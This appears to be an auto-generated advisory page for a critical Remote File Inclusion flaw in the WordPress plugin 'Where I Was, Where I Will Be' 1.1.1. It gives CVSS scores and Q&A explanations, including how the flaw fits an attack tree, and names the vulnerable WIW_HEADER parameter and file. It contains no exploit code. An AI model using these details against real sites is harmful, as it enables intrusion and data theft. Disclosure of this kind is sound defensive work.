Description

The Where I Was, Where I Will Be plugin for WordPress is vulnerable to Remote File Inclusion in version 1.1.1 via the WIW_HEADER parameter of the systemincludeinclude_user.php file. This makes it possible for unauthenticated attackers to include and execute arbitrary files hosted on external servers, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution. This requires allow_url_include to be set to true in order to exploit, which is not commonly enabled.

Classification

Assigner:

CWE:

Links
CPEs
  • wordpress where_i_was_where_i_will_be 1.1.1

CVSS

CVSS version: 3.1 Base score: 9.8
Base severity: CRITICAL Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability score: 3.9 Impact score: 5.9

Can you explain the CVE description?

This CVE description is for a vulnerability in the Where I Was, Where I Will Be plugin for WordPress version 1.1.1. The vulnerability is a Remote File Inclusion issue, which means that unauthenticated attackers can include and execute arbitrary files hosted on external servers by manipulating the WIW_HEADER parameter of the systemincludeinclude_user.php file. This allows the attackers to execute any PHP code in those files, potentially bypassing access controls, obtaining sensitive data, or achieving code execution. The vulnerability has a CVSS score of 9.8, which is considered critical. It requires the allow_url_include setting to be true in order to exploit, which is not commonly enabled. The published date of this CVE is 2024-06-14, and it is currently in the EARLY_WARNING status. The exploitability score is 3.9 and the impact score is 5.9. The vector_cvss indicates that the attack complexity is low, and the confidentiality, integrity, and availability impact are high. There are two URLs provided in the description for further information and resources related to this vulnerability.

How can this vulnerability be part of an attack tree?

This vulnerability can be part of an attack tree by allowing an attacker to exploit the Remote File Inclusion vulnerability in the Where I Was, Where I Will Be plugin for WordPress. By manipulating the WIW_HEADER parameter of the systemincludeinclude_user.php file, an attacker can include and execute arbitrary files hosted on external servers. This could lead to the execution of malicious PHP code, bypassing access controls, obtaining sensitive data, or achieving code execution on the target system. The attacker can use this vulnerability to launch further attacks such as data exfiltration, privilege escalation, or complete compromise of the WordPress site. By leveraging this vulnerability, the attacker can potentially gain unauthorized access to the system and carry out malicious activities. In an attack tree, this vulnerability could be a critical step that enables the attacker to escalate their privileges and gain control over the target system. The attacker may use this vulnerability as a foothold to launch more sophisticated and damaging attacks, ultimately leading to a significant security breach.


Generated on: 2024-07-01